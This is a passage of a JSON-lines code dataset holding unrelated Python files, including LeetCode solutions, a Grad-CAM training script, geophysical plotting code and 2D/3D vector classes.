main()","sub_path":"cnv_tools/Remap/RemapCNV_2_merge_new.py","file_name":"RemapCNV_2_merge_new.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"336815539","text":"\n\n#calss header\nclass _SCREAM():\n\tdef __init__(self,): \n\t\tself.name = \"SCREAM\"\n\t\tself.definitions = [u'a loud, high sound you make when very frightened, excited, or angry: ', u'a person, thing, or situation that is very funny: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_scream.py","file_name":"_scream.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"118914421","text":"class Solution(object):\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n dp = [[0 for y in range(n)] for x in range(m)]\n for x in range(m):\n for y in range(n):\n if x==0 or y==0:\n dp[x][y] = 1\n else:\n dp[x][y] = dp[x-1][y]+dp[x][y-1]\n return dp[m-1][n-1]\n ","sub_path":"062_Unique Paths.py","file_name":"062_Unique Paths.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"513646738","text":"import collections\nimport math\nfrom typing import List\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def __repr__(self):\n return f\"{self.val}\"\n\n\nclass Codec:\n def serialize(self, root):\n if not root:\n return ''\n queue = 
collections.deque()\n queue.append(root)\n res = ''\n while queue:\n node = queue.popleft()\n if not node:\n res += 'None,'\n continue\n res += str(node.val) + ','\n queue.append(node.left)\n queue.append(node.right)\n return res\n\n def deserialize(self, data):\n if not data:\n return None\n ls = data.split(',')\n root = TreeNode(int(ls[0]))\n queue = collections.deque()\n queue.append(root)\n i = 1\n while queue and i < len(ls):\n node = queue.popleft()\n if ls[i] != 'None':\n left = TreeNode(int(ls[i]))\n node.left = left\n queue.append(left)\n i += 1\n if ls[i] != 'None':\n right = TreeNode(int(ls[i]))\n node.right = right\n queue.append(right)\n i += 1\n return root\n\n\nif __name__ == \"__main__\":\n # Your Codec object will be instantiated and called as such:\n codec = Codec()\n\n root = TreeNode(1)\n node_2 = TreeNode(2)\n node_3 = TreeNode(3)\n node_4 = TreeNode(4)\n node_5 = TreeNode(5)\n\n # root.left = node_2\n # root.right = node_3\n # node_3.left = node_4\n # node_3.right = node_5\n\n root.left = node_2\n root.right = node_5\n node_2.left = node_3\n node_2.right = node_4\n\n serialized = codec.serialize(root)\n print(serialized)\n deserialized = codec.deserialize(serialized)\n\n # dfs left traversal\n def dfs_preorder_traversal(node):\n s = [node]\n res = []\n while s:\n curr = s.pop()\n res.append(curr.val)\n if curr.right:\n s.append(curr.right)\n if curr.left:\n s.append(curr.left)\n\n print(res)\n\n def dfs_inorder_traversal(node):\n s = []\n curr = node\n res = []\n while curr or s:\n while curr:\n s.append(curr)\n curr = curr.left\n curr = s.pop()\n res.append(curr.val)\n curr = curr.right\n\n print(res)\n\n def dfs_postorder_traversal(node):\n s = [node]\n res = []\n while s:\n curr = s.pop()\n res.append(curr.val)\n\n if curr.left:\n s.append(curr.left)\n if curr.right:\n s.append(curr.right)\n\n print(res[::-1])\n\n print('DFS pre-order traversal')\n dfs_preorder_traversal(deserialized)\n\n print('DFS in-order traversal')\n dfs_inorder_traversal(deserialized)\n\n print('DFS post-order traversal')\n dfs_postorder_traversal(deserialized)\n","sub_path":"leetcode/p0297_serialize_and_deserialize_binary_tree/solution_bfs.py","file_name":"solution_bfs.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"2679822","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: Karanjot\n#\n# Created: 26/04/2017\n# Copyright: (c) Karanjot 2017\n# Licence: \n#-------------------------------------------------------------------------------\nfrom graphics import *\n\ndef main():\n\n #Create a defgault 200 x 200 window\n win = GraphWin(\"tic - Tac - Toe\") #size of window can be changed by adding in x and y values next to it\n\n #Set coordinates to go from (0,0) in the lower left and (3,3) in the upper right\n win.setCoords(0.0,0.0,3.0,3.0)\n\n #Draw verical lines - side ways\n Line(Point(1,0), Point(1,3)).draw(win)\n Line(Point(2,0), Point(2,3)).draw(win)\n\n #Draw horizontal line - up and down\n Line(Point(0,1), Point(3,1)).draw(win)\n Line(Point(0,2), Point(3,2)).draw(win)\n\n win.getMouse()\n win.close()\n\nmain()","sub_path":"tic tac toe.py","file_name":"tic tac toe.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"266039907","text":"\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom 
torch.utils.tensorboard import SummaryWriter\nimport torchvision\nimport cv2\nimport argparse\nimport time\n\nfrom gradcam import GradCam \nfrom resnet import load_resnet18\nfrom loss.delu import bwLoss\nfrom data.data_manager import DataManager\nfrom loss.sord_function import sord_function\nfrom eval import evaluate, _compute_scores\n\nclass Net(nn.Module):\n \n def __init__(self):\n super(Net, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2), # last convolution\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2))\n self.drop_out = nn.Dropout()\n self.fc1 = nn.Linear(9216, 1000) # 80: 25600, 70: 18496 40000\n self.fc2 = nn.Linear(1000, 4)\n \n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = x.reshape(x.size(0), -1)\n x = self.drop_out(x)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\n\ndef calculate_measures(groundTs, masks):\n sumPrec = 0\n sumRec = 0\n for mask, groundT in zip(masks, groundTs): \n if(mask.sum() == 0):\n ''' handle the case when the generated explanation is composed of all zeros '''\n precision = 0\n recall = 0\n else:\n precision = np.sum(groundT*mask) / (np.sum(groundT*mask) + np.sum((1-groundT)*mask))\n recall = np.sum(groundT*mask) / (np.sum(groundT*mask) + np.sum(groundT*(1-mask)))\n\n sumPrec += precision\n sumRec += recall\n\n return sumPrec, sumRec\n\n\ndef training_model(model, train_loader, bce, optimizer, epoch, num_epochs, n_batches, writer):\n lamb = 0.1\n sumMeanPrec = 0\n sumMeanRec = 0\n\n model.train()\n for i, (images, metadata) in enumerate(train_loader):\n blackGroundTindx = []\n weightForWhitePixel = torch.tensor([14.0])\n weightForBlackPixel = torch.tensor([1.0])\n masks = grad_cam(images,metadata,training=True)\n\n model.train()\n\n tensors_groundTs = []\n for idx, (hospital, expl) in enumerate(zip(metadata[\"hospital\"], metadata[\"explanation\"])):\n npy_groundT = np.load(\"/home/dataset/segmentation frames/\"+hospital+\"/\"+expl)\n resizedGroundT = cv2.resize(npy_groundT, (14,14), cv2.INTER_AREA) \n if resizedGroundT.sum() == 0:\n ''' after resizing, small ground truths may lose all the information.\n We need to track them, if any'''\n blackGroundTindx.append(idx)\n continue\n else:\n resizedGroundT = np.where(resizedGroundT > 0, 255, 0) # pixels greater than 0 are set to 255\n normalizedGroundT = resizedGroundT / 255 # normalize expl between 0 and 1\n tensors_groundTs.append(torch.from_numpy(normalizedGroundT))\n \n groundTs = torch.stack(tensors_groundTs).double() \n\n optimizer.zero_grad()\n weightedGroundTs = torch.where(groundTs > 0, weightForWhitePixel, weightForBlackPixel)\n while blackGroundTindx:\n indx = blackGroundTindx.pop()\n masks = torch.cat((masks[:indx,:,:], masks[indx+1:,:,:]))\n batchSize = len(masks)\n lossG = bce(masks, groundTs)\n weightedLoss = lossG * weightedGroundTs\n loss_gradcam = weightedLoss.mean()\n loss_gradcam = loss_gradcam.cuda()\n loss_label = sord_function(model, images, metadata)\n loss = (lamb * loss_label) + ((1 - lamb) * loss_gradcam)\n loss.backward()\n optimizer.step()\n\n npy_masks = masks.cpu().detach().numpy()\n npy_groundTs = groundTs.cpu().detach().numpy()\n precision, recall = calculate_measures(npy_groundTs, npy_masks)\n\n sumMeanPrec += precision / batchSize\n sumMeanRec += recall / batchSize\n \n if (i + 1) % 105 == 0: \n print('Epoch [{}/{}], Step [{}/{}], Total Loss: {:.4f}, EXPLS:[precision: {:.2f}%, recall: 
{:.2f}%]'\n .format((epoch + 1), num_epochs, (i + 1), len(train_loader), loss.item(), (sumMeanPrec/n_batches)*100, (sumMeanRec/n_batches)*100))\n\n # If you use Tensorboard as visualization tool\n writer.add_scalar(\"Training: Loss\", loss.item(), str(epoch + 1))\n writer.add_scalar(\"Training: Precision\", (sumMeanPrec/n_batches)*100, str(epoch + 1))\n writer.add_scalar(\"Training: Recall\", (sumMeanRec/n_batches)*100, str(epoch + 1))\n if (epoch+1) % 10 == 0: \n torch.save(model.state_dict(), \"./checkpoints/SimpleCNN_epoch_\"+str(epoch+1)+\".pth\") \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # Dataset\n parser.add_argument(\"--num_classes\", default=4, type=int)\n parser.add_argument('--hospitals', nargs='+', type=str, default=['Germania', 'Pavia', 'Lucca', 'Brescia', 'Gemelli - Roma', 'Tione', 'Trento'], \n help='Name of the hospital / folder to be used.')\n parser.add_argument('--dataset_root', default='/home/dataset/', type=str, help='Root folder for the datasets.')\n parser.add_argument('--split_file', default='80_20_activeset.csv', type=str, help='File defining train and test splits.')\n parser.add_argument('--standard_image_size', nargs='+', type=int, default=[250, 250])\n parser.add_argument('--input_image_size', nargs='+', type=int, default=[224,224]) \n parser.add_argument('--domains_count', type=int, default=2)\n parser.add_argument('--domain_label', type=str, default=\"sensor_label\")\n parser.add_argument('--affine_sigma', type=float, default=0.0)\n parser.add_argument('--rotation', type=float, default=23.0)\n # Environment\n parser.add_argument(\"--epochs\", type=int, default=100, help=\"number of epochs\")\n parser.add_argument(\"--num_workers\", default=10, type=int)\n parser.add_argument('--test_size', default=0.3, type=float, help='Relative size of the test set.')\n parser.add_argument('--seed', default=0, type=int, help='Random seed.')\n parser.add_argument('--split', default='patient_hash', type=str, help='The split strategy.')\n parser.add_argument('--stratify', default=None, type=str, help='The field to stratify by.')\n parser.add_argument(\"--gradient_accumulations\", type=int, default=2, help=\"number of gradient accums before step\")\n parser.add_argument(\"--pretrained_weights\", type=str, help=\"if specified starts from checkpoint model\")\n parser.add_argument(\"--checkpoint_interval\", type=int, default=33, help=\"interval between saving model weights\")\n parser.add_argument(\"--evaluation_interval\", type=int, default=3, help=\"interval evaluations on validation set\")\n # Network\n parser.add_argument(\"--batch_size\", default=16, type=int)\n opt = parser.parse_args()\n\n writer = SummaryWriter(\"./runs/\")\n \n num_epochs = 100\n learning_rate = 0.001\n\n cuda = torch.cuda.is_available()\n if cuda:\n print('Using GPU for acceleration')\n else:\n print('Using CPU...')\n\n model = load_resnet18() # or Net() for Simple CNN\n # Start from checkpoint, if specified\n if opt.pretrained_weights:\n model.load_state_dict(torch.load(opt.pretrained_weights))\n print(\"pretrained model loaded!\") \n if cuda:\n model = model.cuda()\n print('Loaded model on GPU')\n\n data_manager = DataManager(opt) \n\n train_dataloader = data_manager.get_dataloaders()[\"train\"]\n test_dataloader = data_manager.get_dataloaders()[\"validation\"]\n\n grad_cam= GradCam(model=model, feature_module=model.layer4, \\\n target_layer_names=[\"1\"], use_cuda=True) # Target layer = last convolutional layer, feature_module = layer where the last conv. 
layer is\n\n batch_size = len(train_dataloader)\n bce = nn.BCELoss(reduce=False)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n \n for epoch in range(num_epochs):\n training_model(model, train_dataloader, bce, optimizer, epoch, num_epochs, batch_size, writer)\n if (epoch+1) % 10 == 0:\n evaluate(model, grad_cam, calculate_measures, test_dataloader, writer, epoch, batch_size)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"284116193","text":"import numpy as np\r\nimport sympy as sym\r\nsym.init_printing()\r\n\r\ndef matrix_multiplication(first_matrix, second_matrix):\r\n '''\r\n Returns the product of two matrices\r\n \r\n Parameters\r\n ----------\r\n first_matrix: 2D array\r\n A two dimensional array with elements of the first matrix\r\n \r\n second_matrix: 2D array\r\n A two dimensional array with elements of the second matrix\r\n \r\n Examples\r\n --------\r\n >>> A = np.array([[5/2, 3, 5, 1], [-8, 7/6, 5, 6], [4/5, 2, -9, 5]])\r\n >>> B = np.array([[8, 4, 7/3, -2], [5/8, -5, 3, 9], [1, 8, 2, 6/5]]).T\r\n >>> matrix_multiplication(A, B)\r\n '''\r\n \r\n A = first_matrix\r\n \r\n B = second_matrix\r\n \r\n Results = np.dot(A,B)\r\n \r\n return sym.Matrix(Results)","sub_path":"pylinearalgebra/matrix_multiplication.py","file_name":"matrix_multiplication.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"104262453","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a Python program for visualizing the data.\nIt is used to view:\n -Convergence curves\n -Approximated surfaces\n -Geophysical data: for this you must specify whether the files carry a header or not\n \nYes, I put more effort into this than I should have.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport math\nimport pandas as pd\n\n#Third-party functions:\ndef truncate(number, decimals=0):\n \"\"\"\n Returns a value truncated to a specific number of decimal places.\n \"\"\"\n if not isinstance(decimals, int):\n raise TypeError(\"decimal places must be an integer.\")\n elif decimals < 0:\n raise ValueError(\"decimal places has to be 0 or more.\")\n elif decimals == 0:\n return math.trunc(number)\n\n factor = 10.0 ** decimals\n return math.trunc(number * factor) / factor\n\n#Own functions:\ndef Esferica(x,y):\n return x ** 2+y**2\n\ndef Rastrigin(x,y):\n return x ** 2 - 10 * np.cos(2 * np.pi * x) ** 2 + y ** 2 - 10 * np.cos(2 * np.pi * y) + 20\n\ndef mallaCuadrada(Min,Max):\n x = np.linspace(Min,Max,1000)\n y = np.linspace(Min,Max,1000)\n x,y= np.meshgrid(x,y)\n return x,y\n\ndef GrafContorno(x,y,z): #the data still needs to be supplied \n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set(title = 'Magnetic anomaly', xlabel = 'x[Km]', ylabel = 'y[km]')\n cs = ax.contourf(x,y,z)\n c =fig.colorbar(cs)\n plt.show()\n \n#Reading n-dimensional data:\ndef LeerOpt(filename,case): \n lines = len(open(filename).readlines())\n if case == 1:\n lines = lines - 1\n with open(filename) as f:\n line = f.readline()\n col = (len(line.split()))\n f.close()\n \n M = np.zeros((lines,col))\n cnt=0\n with open(filename,'r') as f:\n if case == 1:\n next(f)\n lin = f.readline()\n for i in range(lines):\n lin_sep = lin.split()\n #For some reason the seismic data reads with col-1; for the others it is col\n #for j in range(col) \n for j in range(col):\n M[i,j]=(float(lin_sep[j]))\n lin = f.readline()\n cnt= cnt + 1\n f.close()\n return M\n\ndef DefinirRuta(NombreArchivo):\n if os.path.exists(NombreArchivo):\n ruta =os.getcwd()\n filename= ruta +'/'+ NombreArchivo\n else:\n sys.exit('The file does not exist')\n return filename\n\ndef grafSuperficie(x,y,z,x1,y1,z1):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n \n cs = ax.contourf(x,y,z, cmap='inferno')\n ax.scatter(x1,y1,c='g',marker ='.')\n c =fig.colorbar(cs)\n plt.suptitle('Spherical Q=50 Pc =1.0 Pm =0.1')\n plt.savefig('EsfQ50Pc1.0.png')\n plt.show()\n \ndef grafCurvConv(x,y):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set(title = 'Convergence Curve', xlabel = '# of generations', ylabel = 'Convergence')\n ax.scatter(x,y,marker='.')\n plt.suptitle('Spherical Q=50 Pc =1.0 Pm =0.1')\n plt.grid()\n plt.savefig('ConvEsfQ50Pc1.0.png')\n plt.show()\n \ndef grafDatos1d(x,y,title,xlabel,ylabel):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if title == 'SEV':\n ax.set(title = title, xlabel = xlabel, ylabel = ylabel, xscale = 'log')\n else:\n ax.set(title = title, xlabel = xlabel, ylabel = ylabel, xscale = 'linear')\n ax.scatter(x, y, marker='.')\n plt.grid()\n plt.show()\n\ndef MallaDatos(x,y,z):\n for i in range(len(x)):\n dx= truncate(np.abs(x[i+1]-x[i]),5)\n if (dx != 0):\n break\n for i in range(len(y)):\n dy= truncate(np.abs(y[i+1]-y[i]),5)\n if (dy != 0):\n break\n \n Nx = int(((np.max(x) - np.min(x)) / (dx)) + 1)\n Ny = int(((np.max(y) - np.min(y)) / (dy)) + 1)\n \n x.shape=(Nx,Nx)\n y.shape=(Ny,Ny)\n z.shape=(Nx,Ny)\n return x,y,z \n\n\n\n#Main program\n#The input file is specified here\nf = DefinirRuta('AnomM_1.xyz') \n\n#f1 = DefinirRuta('Resultados.dat')\n\n#Read the data\nM = LeerOpt(f,2)\n\n\n#M1 = LeerOpt(f1,2)#Use 1 if you want to skip the first row\n\n#To plot 1-D data:\n#grafDatos1d(M[:,0], M[:,1], 'Anomaly', 'x[m]', 'Delta G')\n\n#To plot 2-D data:\nx, y, z = MallaDatos(M[:,0], M[:,1], M[:,2])\nGrafContorno(x, y, z)\n#For the convergence curve\n#grafCurvConv(M[:,0],M[:,1])\n\n#Performance analysis:\n#[x,y]=mallaCuadrada(-5.12, 5.12) #Rastrigin\n#[x,y]=mallaCuadrada(-5, 5) #Spherical\n#Spherical\n#z=Esferica(x, y)\n#Rastrigin\n#z=Rastrigin(x, y)\n\n#grafSuperficie(x, y, z, M1[:,3], M1[:,4], M1[:,2])\n","sub_path":"Sismica/FuncOptimizar.py","file_name":"FuncOptimizar.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"151104339","text":"\"\"\"vector.py contains definitions for Vector and VectorArray classes\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport numpy as np\n\n\nclass BaseVector(np.ndarray):\n \"\"\"Class to contain basic operations used by all Vector classes\"\"\"\n\n def __new__(cls, *args, **kwargs):\n \"\"\"BaseVector cannot be created\"\"\"\n raise NotImplementedError('Please specify Vector2 or Vector3')\n\n @property\n def x(self):\n \"\"\"x-component of vector\"\"\"\n return self[0]\n\n @x.setter\n def x(self, value):\n self[0] = value\n\n @property\n def y(self):\n \"\"\"y-component of vector\"\"\"\n return self[1]\n\n @y.setter\n def y(self, value):\n self[1] = value\n\n @property\n def length(self):\n \"\"\"Length of vector\"\"\"\n return float(np.sqrt(np.sum(self**2)))\n\n @length.setter\n def length(self, value):\n if not 
np.isscalar(value):\n raise ValueError('Length must be a scalar')\n value = float(value)\n if self.length != 0:\n new_length = value/self.length\n self *= new_length\n return\n if value != 0:\n raise ZeroDivisionError('Cannot resize vector of length 0 to '\n 'nonzero length')\n\n @property\n def rho(self):\n \"\"\"Radial coordinate of this vector (equal to the length of the vector)\"\"\"\n return self.length\n\n @rho.setter\n def rho(self, value):\n self.length = value\n\n @property\n def theta(self):\n \"\"\"\n Angular coordinate / azimuthal angle of this vector in radians\n\n Based on polar coordinate space (or spherical coordinate space for `Vector3`)\n returns angle between this vector and the positive x-axis\n range: (-pi <= theta <= pi)\n \"\"\"\n return float(np.arctan2(self.y, self.x))\n\n # pylint: disable=fixme\n # TODO: Add `theta` and `theta_deg` setters\n # @theta.setter\n # def theta(self, value):\n # ...\n\n @property\n def theta_deg(self):\n \"\"\"\n Angular coordinate / azimuthal angle of this vector in degrees\n\n Based on polar coordinate space (or spherical coordinate space for `Vector3`)\n returns angle between this vector and the positive x-axis\n range: (-180 <= theta_deg <= 180)\n \"\"\"\n return self.theta * 180 / np.pi\n\n def as_length(self, value):\n \"\"\"Return a new vector scaled to given length\"\"\"\n new_vec = self.copy()\n new_vec.length = value\n return new_vec\n\n def as_percent(self, value):\n \"\"\"Return a new vector scaled by given decimal percent\"\"\"\n new_vec = self.copy()\n new_vec.length = value * self.length\n return new_vec\n\n def as_unit(self):\n \"\"\"Return a new vector scaled to length 1\"\"\"\n new_vec = self.copy()\n new_vec.normalize()\n return new_vec\n\n def normalize(self):\n \"\"\"Scale the length of a vector to 1 in place\"\"\"\n self.length = 1\n return self\n\n def dot(self, vec):\n \"\"\"Dot product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Dot product operand must be a vector')\n return np.dot(self, vec)\n\n def cross(self, vec):\n \"\"\"Cross product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Cross product operand must be a vector')\n return self.__class__(np.cross(self, vec))\n\n def angle(self, vec, unit='rad'):\n \"\"\"Calculate the angle between two Vectors\n\n unit: unit for returned angle, either 'rad' or 'deg'. 
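Computed as arccos(self.dot(vec) / (self.length * vec.length)), so the\n result always lies in [0, pi] radians ([0, 180] in degrees).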
Defaults to 'rad'\n \"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Angle operand must be of class {}'\n .format(self.__class__.__name__))\n if unit not in ['deg', 'rad']:\n raise ValueError('Only units of rad or deg are supported')\n\n denom = self.length * vec.length\n if denom == 0:\n raise ZeroDivisionError('Cannot calculate angle between '\n 'zero-length vector(s)')\n\n ang = np.arccos(self.dot(vec) / denom)\n if unit == 'deg':\n ang = ang * 180 / np.pi\n return ang\n\n def __mul__(self, multiplier):\n return self.__class__(self.view(np.ndarray) * multiplier)\n\n\nclass Vector3(BaseVector):\n \"\"\"Primitive 3D vector defined from the origin\n\n New Vector3 can be created with:\n - another Vector3\n - length-3 array\n - x, y, and z values\n - no input (returns [0., 0., 0.])\n \"\"\"\n\n # pylint: disable=fixme\n # TODO: add support for instantiating Vector3 with `polar`=True\n\n def __new__(cls, x=None, y=None, z=None): #pylint: disable=arguments-differ\n\n def read_array(X, Y, Z):\n \"\"\"Build Vector3 from another Vector3, [x, y, z], or x/y/z\"\"\"\n if isinstance(X, cls) and Y is None and Z is None:\n return cls(X.x, X.y, X.z)\n if (isinstance(X, (list, tuple, np.ndarray)) and len(X) == 3 and\n Y is None and Z is None):\n return cls(X[0], X[1], X[2])\n if X is None and Y is None and Z is None:\n return cls(0, 0, 0)\n if np.isscalar(X) and np.isscalar(Y) and np.isscalar(Z):\n xyz = np.r_[X, Y, Z]\n xyz = xyz.astype(float)\n return xyz.view(cls)\n raise ValueError('Invalid input for Vector3 - must be an instance '\n 'of a Vector3, a length-3 array, 3 scalars, or '\n 'nothing for [0., 0., 0.]')\n\n return read_array(x, y, z)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n \"\"\"This is called at the end of ufuncs\n\n If the output is the wrong shape, return the ndarray view\n instead of vector view\n \"\"\"\n if out_arr.shape != (3,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n \"\"\"This is called when initializing the vector\n\n If the constructor is used, obj is None. If slicing is\n used, obj has the same class as self. In both these cases,\n we let things pass.\n\n If we are viewing another array class as a vector, then obj has\n a different class than self. 
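This happens, for example, when\n a plain ndarray is reinterpreted via arr.view(Vector3).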
In this case, if the array has\n an invalid shape a ValueError is raised\n \"\"\"\n if obj is None or obj.__class__ is Vector3:\n return\n if self.shape != (3,):\n raise ValueError(\n 'Invalid array to view as Vector3 - must be length-3 array.'\n )\n\n @property\n def z(self):\n \"\"\"z-component of vector\"\"\"\n return self[2]\n\n @z.setter\n def z(self, value):\n self[2] = value\n\n @property\n def phi(self):\n \"\"\"\n Polar angle / inclination of this vector in radians\n\n Based on spherical coordinate space\n returns angle between this vector and the positive z-axis\n range: (0 <= phi <= pi)\n \"\"\"\n return np.arctan2(np.sqrt(self.x**2 + self.y**2), self.z)\n\n # pylint: disable=fixme\n # TODO: Add `phi` and `phi_deg` setters\n # @phi.setter\n # def phi(self, value):\n # ...\n\n @property\n def phi_deg(self):\n \"\"\"\n Polar angle / inclination of this vector in degrees\n\n Based on spherical coordinate space\n returns angle between this vector and the positive z-axis\n range: (0 <= phi_deg <= 180)\n \"\"\"\n return self.phi * 180 / np.pi\n\n\nclass Vector2(BaseVector):\n \"\"\"Primitive 2D vector defined from the origin\n\n New Vector2 can be created with:\n - another Vector2\n - length-2 array\n - x and y values\n - rho and theta, if polar=True; specify unit as 'rad' (default) or 'deg'\n - no input (returns [0., 0.])\n \"\"\"\n\n def __new__(cls, x=None, y=None, polar=False, unit='rad'): #pylint: disable=arguments-differ\n\n def read_array(X, Y):\n \"\"\"Build Vector2 from another Vector2, [x, y], or x/y\"\"\"\n if isinstance(X, cls) and Y is None:\n if polar:\n raise ValueError('When copying a Vector2, polar=True is not supported')\n return cls(X.x, X.y)\n if (isinstance(X, (list, tuple, np.ndarray)) and len(X) == 2 and\n Y is None):\n return cls(X[0], X[1], polar, unit)\n if X is None and Y is None:\n return cls(0, 0, polar, unit)\n if np.isscalar(X) and np.isscalar(Y):\n if polar:\n if unit not in ['deg', 'rad']:\n raise ValueError('Only units of rad or deg are supported')\n if unit == 'deg':\n Y = Y / 180 * np.pi\n X, Y = X * np.cos(Y), X * np.sin(Y)\n xyz = np.r_[X, Y]\n xyz = xyz.astype(float)\n return xyz.view(cls)\n raise ValueError('Invalid input for Vector2 - must be an instance '\n 'of a Vector2, a length-2 array, 2 scalars, or '\n 'nothing for [0., 0.]')\n\n return read_array(x, y)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if out_arr.shape != (2,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n if obj is None or obj.__class__ is Vector2:\n return\n if self.shape != (2,):\n raise ValueError(\n 'Invalid array to view as Vector2 - must be length-2 array.'\n )\n\n def cross(self, vec):\n \"\"\"Cross product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Cross product operand must be a vector')\n return Vector3(0, 0, np.asscalar(np.cross(self, vec)))\n\n\nclass BaseVectorArray(BaseVector):\n \"\"\"Class to contain basic operations used by all VectorArray classes\"\"\"\n\n @property\n def x(self):\n \"\"\"Array of x-component of vectors\"\"\"\n return self[:, 0]\n\n @x.setter\n def x(self, value):\n self[:, 0] = value\n\n @property\n def y(self):\n \"\"\"Array of y-component of vectors\"\"\"\n return self[:, 1]\n\n @y.setter\n def y(self, value):\n self[:, 1] = value\n\n @property\n def nV(self):\n \"\"\"Number of vectors\"\"\"\n return self.shape[0]\n\n def normalize(self):\n \"\"\"Scale the length of all vectors to 1 in place\"\"\"\n 
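# Assigning an array of ones delegates to the length setter below, which\n # rescales each vector's components in place; any zero-length vector\n # makes the setter raise ZeroDivisionError.\n 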
self.length = np.ones(self.nV)\n return self\n\n @property\n def dims(self):\n \"\"\"Tuple of different dimension names for Vector type\"\"\"\n raise NotImplementedError('Please use Vector2Array or Vector3Array')\n\n @property\n def length(self):\n \"\"\"Array of vector lengths\"\"\"\n return np.sqrt(np.sum(self**2, axis=1)).view(np.ndarray)\n\n @length.setter\n def length(self, l):\n l = np.array(l)\n if self.nV != l.size:\n raise ValueError('Length vector must be the same number of '\n 'elements as vector.')\n # This case resizes all vectors with nonzero length\n if np.all(self.length != 0):\n new_length = l/self.length\n for dim in self.dims:\n setattr(self, dim, new_length*getattr(self, dim))\n return\n # This case only applies to single vectors\n if self.nV == 1 and l == 0:\n assert self.length == 0, \\\n 'Nonzero length should be resized in the first case'\n for dim in self.dims:\n setattr(self, dim, 0.)\n return\n # This case only applies if vectors with length == 0\n # in an array are getting resized to 0\n if self.nV > 1 and np.array_equal(self.length.nonzero(), l.nonzero()): #pylint: disable=no-member\n new_length = l/[x if x != 0 else 1 for x in self.length]\n for dim in self.dims:\n setattr(self, dim, new_length*getattr(self, dim))\n return\n # Error if length zero array is resized to nonzero value\n raise ZeroDivisionError('Cannot resize vector of length 0 to '\n 'nonzero length')\n\n def dot(self, vec):\n \"\"\"Dot product with another vector\"\"\"\n if not isinstance(vec, self.__class__):\n raise TypeError('Dot product operand must be a VectorArray')\n if self.nV != 1 and vec.nV != 1 and self.nV != vec.nV:\n raise ValueError('Dot product operands must have the same '\n 'number of elements.')\n return np.sum((getattr(self, d)*getattr(vec, d) for d in self.dims), 1)\n\n def angle(self, vec, unit='rad'):\n \"\"\"Angle method is only for Vectors, not VectorArrays\"\"\"\n raise NotImplementedError('angle not implemented for VectorArrays')\n\n\nclass Vector3Array(BaseVectorArray):\n \"\"\"List of Vector3\n\n A new Vector3Array can be created with:\n - another Vector3Array\n - x/y/z lists of equal length\n - n x 3 array\n - nothing (returns [[0., 0., 0.]])\n \"\"\"\n\n def __new__(cls, x=None, y=None, z=None): #pylint: disable=arguments-differ\n\n def read_array(X, Y, Z):\n \"\"\"Build Vector3Array from various inputs\"\"\"\n if isinstance(X, cls) and Y is None and Z is None:\n X = np.atleast_2d(X)\n return cls(X.x.copy(), X.y.copy(), X.z.copy())\n if isinstance(X, (list, tuple)):\n X = np.array(X)\n if isinstance(Y, (list, tuple)):\n Y = np.array(Y)\n if isinstance(Z, (list, tuple)):\n Z = np.array(Z)\n if isinstance(X, np.ndarray) and Y is None and Z is None:\n X = np.squeeze(X)\n if X.size == 3:\n X = 